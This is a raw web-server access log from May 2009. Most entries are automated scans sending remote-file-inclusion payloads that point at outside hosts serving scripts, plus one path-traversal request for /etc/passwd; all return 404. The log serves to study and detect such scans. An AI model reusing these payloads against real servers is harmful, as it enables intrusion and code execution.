207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
207.216.198.68 - - [25/May/2009:00:44:18 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0)"
210.109.103.203 - - [25/May/2009:00:44:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
210.109.103.203 - - [25/May/2009:00:44:19 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
35.8.197.50 - - [25/May/2009:00:44:37 -0400] "GET /logs/errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
35.8.197.50 - - [25/May/2009:00:44:37 -0400] "GET /errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
35.8.197.50 - - [25/May/2009:00:44:45 -0400] "GET /errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
35.8.197.50 - - [25/May/2009:00:44:45 -0400] "GET /logs/errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.109.103.203 - - [25/May/2009:00:45:10 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
210.109.103.203 - - [25/May/2009:00:45:10 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:00:45:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.50.3 - - [25/May/2009:00:45:34 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:45:34 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:45:43 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:46:59 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:14 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:14 -0400] "GET /logs/error_log.Q108121200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:32 -0400] "GET /logs/error_log.Q108060400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:45 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:45 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:45 -0400] "GET /logs/error_log.Q108121200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:00:47:57 -0400] "GET /logs/error_log.Q108060400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
110.45.146.146 - - [25/May/2009:00:48:46 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:48:46 -0400] "GET //include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:48:46 -0400] "GET /logs//include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:49:00 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
35.8.197.50 - - [25/May/2009:00:49:00 -0400] "GET /errors.php?error=http://www.souzamolduras.com.br/fotos_perfis/help/cmd? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
222.236.44.69 - - [25/May/2009:00:49:59 -0400] "GET /logs/access_log.Q108120400//components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:00:49:59 -0400] "GET //components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:00:49:59 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:00:50:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.44.69 - - [25/May/2009:00:50:16 -0400] "GET /logs/access_log.Q109051100//components/com_flyspray/startdown.php?file=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
87.106.67.146 - - [25/May/2009:00:50:26 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.67.146 - - [25/May/2009:00:51:51 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.146.146 - - [25/May/2009:00:54:30 -0400] "GET /logs/error_log.Q108052600%20/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
78.40.224.155 - - [25/May/2009:00:54:51 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:54:51 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:54:51 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:55:03 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:55:05 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:55:05 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:55:05 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.106.67.146 - - [25/May/2009:00:55:07 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:00:55:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.40.224.155 - - [25/May/2009:00:55:17 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
77.221.130.2 - - [25/May/2009:00:56:33 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:33 -0400] "GET /logs/error_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:33 -0400] "GET /logs/access_log.Q108081500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:34 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:35 -0400] "GET /logs/error_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:35 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:35 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:56:35 -0400] "GET /logs/access_log.Q108081500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:00:57:16 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:00:57:16 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:00:57:17 -0400] "GET /logs/error_log.Q108090200%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:00:57:57 -0400] "GET /logs/error_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:00:57:57 -0400] "GET /logs/error_log.Q108102000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
78.40.224.155 - - [25/May/2009:00:59:04 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:59:11 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:59:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:59:31 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:59:39 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:00:59:39 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.221.130.2 - - [25/May/2009:00:59:44 -0400] "GET /logs/error_log.Q108090200%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:00:59:58 -0400] "GET /logs/error_log.Q108090200%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
209.59.12.99 - - [25/May/2009:01:00:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.40.224.155 - - [25/May/2009:01:00:54 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:00:54 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:01:18 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.33.219.22 - - [25/May/2009:01:01:59 -0400] "GET /logs/access_log.Q107060500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.33.219.22 - - [25/May/2009:01:01:59 -0400] "GET //blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 222 "-" "Mozilla/5.0"
66.33.219.22 - - [25/May/2009:01:01:59 -0400] "GET /logs//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.143.3.188 - - [25/May/2009:01:02:06 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
220.181.7.97 - - [25/May/2009:01:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [25/May/2009:01:04:03 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
80.237.146.58 - - [25/May/2009:01:05:00 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:05:00 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:05:00 -0400] "GET /logs/access_log.Q109051000%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:01:05:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.52.167.208 - - [25/May/2009:01:06:22 -0400] "GET /errors.php?error=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
110.45.145.66 - - [25/May/2009:01:07:57 -0400] "GET /logs/access_log.Q109051000%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
110.45.145.66 - - [25/May/2009:01:07:57 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
110.45.145.66 - - [25/May/2009:01:07:57 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:08:17 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:08:23 -0400] "GET /logs/error_log.Q109050400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:08:23 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:08:24 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:08:57 -0400] "GET /logs/error_log.Q109050400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:08:57 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:08:57 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
78.40.224.155 - - [25/May/2009:01:09:16 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:10:09 -0400] "GET /logs/error_log.Q108081200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.825"
209.59.12.99 - - [25/May/2009:01:10:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.36.213.166 - - [25/May/2009:01:10:41 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
116.36.213.166 - - [25/May/2009:01:10:44 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.36.213.166 - - [25/May/2009:01:10:47 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:10:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:10:48 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:10:49 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:10:59 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.141.54.240 - - [25/May/2009:01:10:59 -0400] "GET //index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
78.40.224.155 - - [25/May/2009:01:11:15 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:11:15 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:11:15 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:11:33 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:11:33 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:11:33 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:11:49 -0400] "GET /logs/access_log.Q109021500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:12:02 -0400] "GET /logs/access_log.Q109021500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:01:12:49 -0400] "GET /logs/access_log.Q107072800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.103.144 - - [25/May/2009:01:13:05 -0400] "GET /logs/access_log.Q108110400//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:13:05 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:13:06 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.825"
121.173.130.41 - - [25/May/2009:01:13:11 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:13:11 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:13:11 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:13:16 -0400] "GET /logs/error_log.Q109050400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:13:16 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:13:16 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
208.52.167.208 - - [25/May/2009:01:13:23 -0400] "GET /logs/access_log.Q109021500/errors.php?error=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
208.52.167.208 - - [25/May/2009:01:13:23 -0400] "GET /logs/errors.php?error=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
208.111.154.15 - - [25/May/2009:01:14:08 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [25/May/2009:01:14:08 -0400] "GET /logs/access_log.Q108061000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
